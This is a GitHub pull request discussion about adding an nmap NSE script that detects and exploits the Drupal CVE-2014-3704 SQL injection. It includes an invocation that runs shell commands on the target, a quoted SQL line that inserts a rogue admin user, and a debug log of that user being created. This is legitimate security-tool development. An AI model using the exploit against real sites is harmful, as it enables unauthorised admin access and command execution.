Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add NSE script for detecting & exploiting CVE-2014-3704 #226

Closed
wants to merge 5 commits into from

Conversation

mzet-
Copy link

@mzet- mzet- commented Oct 14, 2015

Overview

Following script detects & exploits CVE-2014-3704 vulnerability (pre Auth SQL Injection) in Drupal core.

Running the script

Running the script:
nmap -P0 -p80 -n --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",
http-vuln-cve2014-8877.uri="/drupal" 192.168.1.1

Where 'cmd' parameter is shell command for execution and 'uri' is path to your Drupal installation.

@jkryanchou
Copy link

👍

@dmiller-nmap
Copy link

This looks cool! I'll be doing a bit more testing, but my first question is regarding the password hash: it looks like you always generate a hash of the empty string. Is there a reason for this? If it has to be empty/blank, then it would be better to just include the hash literal (constant salt) to avoid doing all the extra computation. On the other hand, maybe we should expose the password to the user and let them set whatever password they want. Either way, the choice should be documented.

Excited to get this merged soon!

@mzet-
Copy link
Author

mzet- commented Nov 14, 2015

Hi,

Hash is not blank, password is chosen at random and then hash is generated. Please see the lines 181 & 182 in do_sql_query function:

passwd = stdnse.generate_random_string(10)
passHash = gen_passwd_hash(passwd)

Then passHash is used to construct sql query:

sql_user = url.escape("insert into users (uid,name,pass,mail,status) select max(uid)+1,'" .. user .. "','" .. passHash .. "','" .. email .. "',1 from users;")

See https://secwiki.org/w/Nmap/Code_Standards for helpful tools to check
for these issues.

Minor code changes:
* replaced a chain of string.char(string.byte()) with string.sub.
* Initialized a few tables inline instead of subsequent index assignments
@dmiller-nmap
Copy link

@mzet- I opened a pull request on your branch for some changes that I would like to make before committing this. If you can make sure I did not break anything, I'll be able to get this merged right away. Thanks!

@mzet-
Copy link
Author

mzet- commented Nov 18, 2015

Daniel,

Thanks for cleanups. I also did some additional cleanups and testing.

@mzet-
Copy link
Author

mzet- commented Nov 22, 2015

@dmiller-nmap

Script is ready for merging.

@mzet-
Copy link
Author

mzet- commented Dec 11, 2015

@dmiller-nmap

Is there anything in the script that prevents you from accepting this PR?

@dmiller-nmap
Copy link

@mzet- I've been involved in the OS X installer issue for a while, but getting back to working through PRs. I'll make this my first priority, thanks for the reminder.

@nmap-bot nmap-bot closed this in bb07040 Dec 14, 2015
qha pushed a commit to qha/nmap that referenced this pull request Dec 16, 2015
@phackt
Copy link

phackt commented Jun 1, 2017

Hello guys, is this script running for you? I installed a vulnerable version of Drupal (7.2), i succeeded in exploiting it thanks to this vuln but nmap is not reporting any vulnerable drupal version:

nmap -p 80 --script http-vuln-cve2014-3704 127.0.0.1

just displays that the port 80 is open. Drupal is at the webroot, no script args needed.
To be honest i did not investigate yet into the script.

Thanks,

@mzet-
Copy link
Author

mzet- commented Jun 5, 2017 via email

@phackt
Copy link

phackt commented Jun 5, 2017

@mzet- yes of course:

$ nmap -d -p 80 --script http-vuln-cve2014-3704 127.0.0.1

Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-06-05 16:25 CEST
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
NSE: Using Lua 5.3.
NSE: Arguments from CLI: 
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 16:25
Completed NSE at 16:25, 0.00s elapsed
Initiating Ping Scan at 16:25
Scanning 127.0.0.1 [2 ports]
Completed Ping Scan at 16:25, 0.00s elapsed (1 total hosts)
Overall sending rates: 10928.96 packets / s.
mass_rdns: Using DNS server 209.222.18.222
mass_rdns: Using DNS server 209.222.18.218
mass_rdns: Using DNS server fe80::237:b7ff:fe7e:cd74%wlan0
mass_rdns: Using DNS server 192.168.1.1
Initiating Connect Scan at 16:25
Scanning localhost (127.0.0.1) [1 port]
Discovered open port 80/tcp on 127.0.0.1
Completed Connect Scan at 16:25, 0.00s elapsed (1 total ports)
Overall sending rates: 9523.81 packets / s.
NSE: Script scanning 127.0.0.1.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 16:25
NSE: Starting http-vuln-cve2014-3704 against 127.0.0.1:80.
NSE: [http-vuln-cve2014-3704 127.0.0.1:80] adding admin user (username: 'QOTQZJWFUD'; passwd: 'ENOROURUBJ')
NSE: [http-vuln-cve2014-3704 127.0.0.1:80] logging in as admin user (username: 'QOTQZJWFUD'; passwd: 'ENOROURUBJ')
NSE: Finished http-vuln-cve2014-3704 against 127.0.0.1:80.
Completed NSE at 16:25, 0.03s elapsed
Nmap scan report for localhost (127.0.0.1)
Host is up, received syn-ack (0.00012s latency).
Scanned at 2017-06-05 16:25:45 CEST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
Final times for host: srtt: 115 rttvar: 3769  to: 100000

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 16:25
Completed NSE at 16:25, 0.00s elapsed
Read from /home/phackt/Documents/repo/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

Regards,

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

5 participants